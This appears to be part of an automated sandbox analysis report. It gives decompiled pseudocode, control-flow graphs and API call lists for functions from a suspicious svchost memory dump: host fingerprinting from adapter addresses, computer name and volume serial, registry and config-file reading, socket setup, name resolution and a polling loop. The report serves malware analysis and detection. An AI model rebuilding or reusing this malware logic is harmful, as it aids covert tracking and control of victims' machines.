                                                                                control_flow_graph 1300 121ac3-121adc LoadLibraryA 1301 121ae2-121af3 GetProcAddress 1300->1301 1302 121b6b-121b70 1300->1302 1303 121af5-121b01 1301->1303 1304 121b6a 1301->1304 1305 121b1c-121b27 GetAdaptersAddresses 1303->1305 1304->1302 1306 121b03-121b12 call 12ebed 1305->1306 1307 121b29-121b2b 1305->1307 1306->1307 1315 121b14-121b1b 1306->1315 1308 121b5b-121b5e 1307->1308 1309 121b2d-121b32 1307->1309 1313 121b69 1308->1313 1314 121b60-121b68 call 12ec2e 1308->1314 1312 121b34-121b3b 1309->1312 1309->1313 1316 121b54-121b59 1312->1316 1317 121b3d-121b52 1312->1317 1313->1304 1314->1313 1315->1305 1316->1308 1316->1312 1317->1316 1317->1317
                                                                                C-Code - Quality: 64%
                                                                                			E00121AC3() {
				signed int _v8;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _t19;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr* _t28;
				signed int _t39;
				void* _t41;
				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t23 =  *_t28(2, 0, 0); // executed
					_t41 = _t23;
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0012EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0012EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}














                                                                                0x00121ad1
                                                                                0x00121ad4
                                                                                0x00121adc
                                                                                0x00121b6b
                                                                                0x00121b70
                                                                                0x00121b70
                                                                                0x00121aef
                                                                                0x00121af3
                                                                                0x00121b6a
                                                                                0x00000000
                                                                                0x00121b6a
                                                                                0x00121af9
                                                                                0x00121afa
                                                                                0x00121afd
                                                                                0x00121b00
                                                                                0x00121b1c
                                                                                0x00121b20
                                                                                0x00121b22
                                                                                0x00121b27
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121b09
                                                                                0x00121b12
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121b17
                                                                                0x00121b18
                                                                                0x00121b1b
                                                                                0x00121b1b
                                                                                0x00121b2b
                                                                                0x00121b5b
                                                                                0x00121b5e
                                                                                0x00121b63
                                                                                0x00121b68
                                                                                0x00121b69
                                                                                0x00000000
                                                                                0x00121b69
                                                                                0x00121b2d
                                                                                0x00121b32
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121b34
                                                                                0x00121b34
                                                                                0x00121b34
                                                                                0x00121b37
                                                                                0x00121b3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121b3d
                                                                                0x00121b3d
                                                                                0x00121b4c
                                                                                0x00121b4f
                                                                                0x00121b50
                                                                                0x00121b54
                                                                                0x00121b54
                                                                                0x00121b57
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesLibraryLoadProc
                                                                                • String ID: GetAdaptersAddresses$Iphlpapi.dll
                                                                                • API String ID: 3646706440-1087626847
                                                                                • Opcode ID: 06b4b904d2232ce43ba86f265ca43eb7cdac7f139de6875a1103de300429a43c
                                                                                • Instruction ID: b67e311525e74d6a6aa014924322751471e71b19ec2de38985b43eac933dbc38
                                                                                • Opcode Fuzzy Hash: 06b4b904d2232ce43ba86f265ca43eb7cdac7f139de6875a1103de300429a43c
                                                                                • Instruction Fuzzy Hash: A911D371E01138BFCB26DBA4EC858EEBBB9EB68B10F144456F009A3140E7304E50DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012E3CA Relevance: 7.6, APIs: 5, Instructions: 136registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1320 12e3ca-12e3ee RegOpenKeyExA 1321 12e3f4-12e3fb 1320->1321 1322 12e528-12e52d 1320->1322 1323 12e3fe-12e403 1321->1323 1323->1323 1324 12e405-12e40f 1323->1324 1325 12e411-12e413 1324->1325 1326 12e414-12e452 call 12ee08 call 12f1ed RegQueryValueExA 1324->1326 1325->1326 1331 12e458-12e486 call 12f1ed RegQueryValueExA 1326->1331 1332 12e51d-12e527 RegCloseKey 1326->1332 1335 12e488-12e48a 1331->1335 1332->1322 1335->1332 1336 12e490-12e4a1 call 12db2e 1335->1336 1336->1332 1339 12e4a3-12e4a6 1336->1339 1340 12e4a9-12e4d3 call 12f1ed RegQueryValueExA 1339->1340 1343 12e4d5-12e4da 1340->1343 1344 12e4e8-12e4ea 1340->1344 1343->1344 1345 12e4dc-12e4e6 1343->1345 1344->1332 1346 12e4ec-12e516 call 122544 call 12e332 1344->1346 1345->1340 1345->1344 1346->1332
                                                                                C-Code - Quality: 100%
                                                                                			E0012E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				long _t50;
				intOrPtr* _t52;
				int _t69;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				_t50 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16); // executed
				if(_t50 != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x1328f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0012EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0012F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0012F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0012DB2E(_t89);
					_t69 =  *0x1336c4; // 0x0
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0012F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						_t75 =  *0x1336c4; // 0x0
						E00122544(_t75, _t75, _v32, 0xe4, 0xc8);
						E0012E332(_t82, _t106,  *0x1336c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}

























                                                                                0x0012e3ca
                                                                                0x0012e3e0
                                                                                0x0012e3e6
                                                                                0x0012e3ee
                                                                                0x0012e528
                                                                                0x0012e52d
                                                                                0x0012e52d
                                                                                0x0012e3f4
                                                                                0x0012e3f9
                                                                                0x0012e3fb
                                                                                0x0012e3fb
                                                                                0x0012e3fe
                                                                                0x0012e3fe
                                                                                0x0012e400
                                                                                0x0012e401
                                                                                0x0012e407
                                                                                0x0012e409
                                                                                0x0012e40f
                                                                                0x0012e413
                                                                                0x0012e413
                                                                                0x0012e41c
                                                                                0x0012e421
                                                                                0x0012e429
                                                                                0x0012e42c
                                                                                0x0012e42f
                                                                                0x0012e43a
                                                                                0x0012e452
                                                                                0x0012e51d
                                                                                0x0012e520
                                                                                0x00000000
                                                                                0x0012e458
                                                                                0x0012e458
                                                                                0x0012e458
                                                                                0x0012e45b
                                                                                0x0012e463
                                                                                0x0012e469
                                                                                0x0012e46e
                                                                                0x0012e484
                                                                                0x0012e48a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e491
                                                                                0x0012e494
                                                                                0x0012e499
                                                                                0x0012e4a1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e4a3
                                                                                0x0012e4a6
                                                                                0x0012e4a9
                                                                                0x0012e4ae
                                                                                0x0012e4b4
                                                                                0x0012e4b9
                                                                                0x0012e4d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e4d5
                                                                                0x0012e4da
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e4dc
                                                                                0x0012e4df
                                                                                0x0012e4e1
                                                                                0x0012e4e6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012e4e6
                                                                                0x0012e4e8
                                                                                0x0012e4ea
                                                                                0x0012e4ec
                                                                                0x0012e500
                                                                                0x0012e50e
                                                                                0x0012e516
                                                                                0x0012e516
                                                                                0x00000000
                                                                                0x0012e4ea

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000001,0012E5F2,00000000,00020119,0012E5F2,001322F8), ref: 0012E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0012E44E
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0012E482
                                                                                • RegQueryValueExA.ADVAPI32(0012E5F2,?,00000000,?,80000001,?), ref: 0012E4CF
                                                                                • RegCloseKey.ADVAPI32(0012E5F2,?,?,?,?,000000C8,000000E4), ref: 0012E520
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID:
                                                                                • API String ID: 1586453840-0
                                                                                • Opcode ID: 697f948e24f9fbb2cebf8bdb0211688f585b02892b16f287200eac4d24391052
                                                                                • Instruction ID: 507ac6ad1dff945a62036bf8d530b6d523ed75289fb26e031a291e4e4940973b
                                                                                • Opcode Fuzzy Hash: 697f948e24f9fbb2cebf8bdb0211688f585b02892b16f287200eac4d24391052
                                                                                • Instruction Fuzzy Hash: 4041F4B2D0022DBFEF11AF94EC81DEEBBB9EB18344F544466F911E6150E3319A658B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1351 12f26d-12f303 setsockopt * 5
                                                                                APIs
                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0012F2A0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0012F2C0
                                                                                • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0012F2DD
                                                                                • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0012F2EC
                                                                                • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0012F2FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: setsockopt
                                                                                • String ID:
                                                                                • API String ID: 3981526788-0
                                                                                • Opcode ID: 9e7ae06f7ed88f4e4d35f6c8431512c1092b17a0b313100f8acbedfa4b22ff16
                                                                                • Instruction ID: d6910874bd6481b386edd8926a18e198e7632cfdf51e3eb6eb67553e31f1739c
                                                                                • Opcode Fuzzy Hash: 9e7ae06f7ed88f4e4d35f6c8431512c1092b17a0b313100f8acbedfa4b22ff16
                                                                                • Instruction Fuzzy Hash: F8110AB2A40248BAEF11DF94CD85FDE7FBDEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121BDF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1352 121bdf-121c04 call 121ac3 1354 121c09-121c0b 1352->1354 1355 121c5a-121c5e 1354->1355 1356 121c0d-121c1d GetComputerNameA 1354->1356 1357 121c45-121c57 GetVolumeInformationA 1356->1357 1358 121c1f-121c24 1356->1358 1357->1355 1358->1357 1359 121c26-121c3b 1358->1359 1359->1359 1360 121c3d-121c3f 1359->1360 1360->1357 1361 121c41-121c43 1360->1361 1361->1355
                                                                                C-Code - Quality: 76%
                                                                                			E00121BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00121AC3(); // executed
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}











                                                                                0x00121bec
                                                                                0x00121bf2
                                                                                0x00121bf3
                                                                                0x00121bf4
                                                                                0x00121bf5
                                                                                0x00121bf7
                                                                                0x00121bf9
                                                                                0x00121bfc
                                                                                0x00121bfd
                                                                                0x00121c04
                                                                                0x00121c0b
                                                                                0x00121c1d
                                                                                0x00121c45
                                                                                0x00121c51
                                                                                0x00000000
                                                                                0x00121c57
                                                                                0x00121c1f
                                                                                0x00121c24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121c26
                                                                                0x00121c26
                                                                                0x00121c35
                                                                                0x00121c37
                                                                                0x00121c38
                                                                                0x00121c3f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00121c41
                                                                                0x00121c5e

                                                                                APIs
                                                                                  • Part of subcall function 00121AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                  • Part of subcall function 00121AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                  • Part of subcall function 00121AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00121C15
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00121C51
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: hi_id$localcfg
                                                                                • API String ID: 2794401326-2393279970
                                                                                • Opcode ID: a595c6f7ba6949d97808c9f7dcd62cff2fcfc956b45c6556771f38243fa341d5
                                                                                • Instruction ID: 3f704b001dcdfb9c0a11fe411a4e3021ad49184b366a03c25e96ad24f8f87f9a
                                                                                • Opcode Fuzzy Hash: a595c6f7ba6949d97808c9f7dcd62cff2fcfc956b45c6556771f38243fa341d5
                                                                                • Instruction Fuzzy Hash: 2C019276A40128BFEB14DAF8DCC59EFBBBCEB58785F100475E602E3100D3309E5486A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00121B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E00121B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00121AC3(); // executed
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0012ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                0x00121b7e
                                                                                0x00121b84
                                                                                0x00121b85
                                                                                0x00121b86
                                                                                0x00121b87
                                                                                0x00121b89
                                                                                0x00121b8c
                                                                                0x00121b8d
                                                                                0x00121b94
                                                                                0x00121ba3
                                                                                0x00121bb8
                                                                                0x00121bc8
                                                                                0x00121bca
                                                                                0x00121bcd
                                                                                0x00000000
                                                                                0x00121bd8
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00121AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00121AD4
                                                                                  • Part of subcall function 00121AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00121AE9
                                                                                  • Part of subcall function 00121AC3: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00121B20
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00121BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00121EFD,00000000,00000000,00000000,00000000), ref: 00121BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdaptersAddressAddressesComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2794401326-1857712256
                                                                                • Opcode ID: de1c2aedf2d51f123fdbc60bd80e55816cdc592909a6f4d2240b9a172f2b23cd
                                                                                • Instruction ID: b493ea33ef6ef3e1e6de21bb85bddba1b714e094987c13205638defc1d1a75a6
                                                                                • Opcode Fuzzy Hash: de1c2aedf2d51f123fdbc60bd80e55816cdc592909a6f4d2240b9a172f2b23cd
                                                                                • Instruction Fuzzy Hash: 8B014BB6D00118BFEB019BE9DC819EFFABCAB58650F150162A601E7151D6705E0846A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00122684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WS2_32(00000001), ref: 00122693
                                                                                • gethostbyname.WS2_32(00000001), ref: 0012269F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: a8d70bb378e131d7030703118137f8fd901e2cb0e1ed698b1c99471a95276b81
                                                                                • Instruction ID: 3ef704f52b759766fed93d5d91a0ef9b0778e61f0313d6cb9df9f5e1230e8d64
                                                                                • Opcode Fuzzy Hash: a8d70bb378e131d7030703118137f8fd901e2cb0e1ed698b1c99471a95276b81
                                                                                • Instruction Fuzzy Hash: 8DE0C732204021AFCB118B28F848ACA3BE4EF0A330F028180F840E32A0D770ECC08B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012E52E Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0012E52E(void* __edx, void* __eflags) {
				long _v4;
				void* __ecx;
				void* _t9;
				void* _t11;
				void* _t17;
				long _t20;
				void* _t23;
				int _t24;
				void* _t25;
				void* _t28;
				void* _t32;
				void* _t37;
				void* _t40;
				void* _t44;

				_t44 = __eflags;
				_t32 = __edx;
				E0012DD05();
				_t28 = E0012DBCF(_t44, 0x80000000, 3);
				_pop(_t31);
				if(_t28 == 0xffffffff) {
					L6:
					_t9 = E00122544(0x1328f8, 0x1310d0, 7, 0xe4, 0xc8);
					_t11 = E0012E3CA(_t32, 0x80000001, E00122544(0x1322f8, 0x1310bc, 0x14, 0xe4, 0xc8), _t9); // executed
					_t40 = _t37 + 0x34;
					if(_t11 == 0) {
						_t17 = E00122544(0x1328f8, 0x1310d0, 7, 0xe4, 0xc8);
						E0012E3CA(_t32, 0x80000001, E00122544(0x1322f8, 0x1310a0, 0x19, 0xe4, 0xc8), _t17); // executed
						_t40 = _t40 + 0x34;
					}
					E0012EE2A(_t31, 0x1322f8, 0, 0x100);
					E0012EE2A(_t31, 0x1328f8, 0, 0x100);
					E0012DD69();
					return 1;
				}
				_t20 = GetFileSize(_t28, 0);
				_v4 = _t20;
				if(_t20 != 0) {
					E0012DB2E(_t20);
					_t23 =  *0x1336c4; // 0x0
					_pop(_t31);
					if(_t23 != 0) {
						_t31 =  &_v4;
						_t24 = ReadFile(_t28, _t23, _v4,  &_v4, 0);
						_t48 = _t24;
						if(_t24 != 0) {
							_t25 =  *0x1336c4; // 0x0
							E00122544(_t25, _t25, _v4, 0xe4, 0xc8);
							E0012E332(_t32, _t48,  *0x1336c4, _v4);
							_t37 = _t37 + 0x1c;
						}
					}
				}
				CloseHandle(_t28);
				goto L6;
			}

















                                                                                0x0012e52e
                                                                                0x0012e52e
                                                                                0x0012e533
                                                                                0x0012e544
                                                                                0x0012e54c
                                                                                0x0012e553
                                                                                0x0012e5b8
                                                                                0x0012e5c7
                                                                                0x0012e5ed
                                                                                0x0012e5f2
                                                                                0x0012e5f7
                                                                                0x0012e603
                                                                                0x0012e624
                                                                                0x0012e629
                                                                                0x0012e629
                                                                                0x0012e635
                                                                                0x0012e63e
                                                                                0x0012e646
                                                                                0x0012e653
                                                                                0x0012e653
                                                                                0x0012e558
                                                                                0x0012e55e
                                                                                0x0012e564
                                                                                0x0012e567
                                                                                0x0012e56c
                                                                                0x0012e571
                                                                                0x0012e574
                                                                                0x0012e578
                                                                                0x0012e583
                                                                                0x0012e589
                                                                                0x0012e58b
                                                                                0x0012e58d
                                                                                0x0012e59a
                                                                                0x0012e5a9
                                                                                0x0012e5ae
                                                                                0x0012e5ae
                                                                                0x0012e58b
                                                                                0x0012e574
                                                                                0x0012e5b2
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0012DD05: GetTickCount.KERNEL32 ref: 0012DD0F
                                                                                  • Part of subcall function 0012DD05: InterlockedExchange.KERNEL32(001336B4,00000001), ref: 0012DD44
                                                                                  • Part of subcall function 0012DD05: GetCurrentThreadId.KERNEL32 ref: 0012DD53
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E558
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E583
                                                                                • CloseHandle.KERNEL32(00000000,?,74CB43E0,?,00000000,?,0012A445), ref: 0012E5B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCountCurrentExchangeHandleInterlockedReadSizeThreadTick
                                                                                • String ID:
                                                                                • API String ID: 3683885500-0
                                                                                • Opcode ID: 8a9d4a0e6dde61faee43dedd9d83a20cd56723bc88846c3612feabb3036fc5b8
                                                                                • Instruction ID: a8d9ea6b904e60eec8d58858998c41e13c79d13e7711a48368c2258ab00e383d
                                                                                • Opcode Fuzzy Hash: 8a9d4a0e6dde61faee43dedd9d83a20cd56723bc88846c3612feabb3036fc5b8
                                                                                • Instruction Fuzzy Hash: B121F7B2A403207EE6257B21BC07FAB3A9CDB65750F000518FA0AA11D3FB61D970C6F1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012877E Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 100sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0012877E() {
				char _v256;
				void* _t16;
				char _t33;
				char* _t36;
				char _t45;
				char _t47;
				void* _t52;
				void* _t53;

				_t52 =  &_v256;
				if(( *0x132f18 & 0x00000001) == 0) {
					 *0x132f18 =  *0x132f18 | 0x00000001;
					 *0x132f14 = E0012F04E(0);
				}
				if(( *0x132f18 & 0x00000002) == 0) {
					 *0x132f18 =  *0x132f18 | 0x00000002;
					 *0x132f10 = E0012F04E(0);
				}
				_t51 = "ip";
				_t49 = "localcfg";
				_t47 = E0012E819(1, "localcfg", "ip", 0);
				_t53 = _t52 + 0x10;
				if(_t47 != 0 && E001226B2(_t47,  &_v256) != 0) {
					E0012E8A1(_t45, 1, _t49, "rresolv",  &_v256);
					_t53 = _t53 + 0x10;
				}
				L7:
				E00128CEE();
				E0012C4D6();
				E0012C4E2();
				_push(0x132118);
				E00122011();
				if(E0012F04E(0) -  *0x132f14 > 0x1e) {
					_t33 = E0012E819(1, _t49, _t51, _t47);
					_t53 = _t53 + 0x10;
					if(_t47 != _t33) {
						if(E001226B2(_t33,  &_v256) != 0) {
							E0012E8A1(_t45, 1, _t49, "rresolv",  &_v256);
							_t53 = _t53 + 0x10;
						}
						_t47 = _t33;
					}
					 *0x132f14 = E0012F04E(0);
				}
				_t16 = E0012F04E(0);
				_pop(_t36);
				if(_t16 -  *0x132f10 >= 0xa) {
					E00128328(_t36, _t45); // executed
					 *0x132f10 = E0012F04E(0);
				}
				Sleep(0x3e8); // executed
				goto L7;
			}











                                                                                0x0012877e
                                                                                0x0012878f
                                                                                0x00128791
                                                                                0x001287a0
                                                                                0x001287a0
                                                                                0x001287ac
                                                                                0x001287ae
                                                                                0x001287bd
                                                                                0x001287bd
                                                                                0x001287c4
                                                                                0x001287ca
                                                                                0x001287d7
                                                                                0x001287d9
                                                                                0x001287de
                                                                                0x001287fe
                                                                                0x00128803
                                                                                0x00128803
                                                                                0x00128806
                                                                                0x00128806
                                                                                0x0012880b
                                                                                0x00128810
                                                                                0x00128815
                                                                                0x0012881a
                                                                                0x00128831
                                                                                0x0012883d
                                                                                0x0012883f
                                                                                0x00128844
                                                                                0x00128855
                                                                                0x00128864
                                                                                0x00128869
                                                                                0x00128869
                                                                                0x0012886c
                                                                                0x0012886c
                                                                                0x00128876
                                                                                0x00128876
                                                                                0x0012887d
                                                                                0x00128888
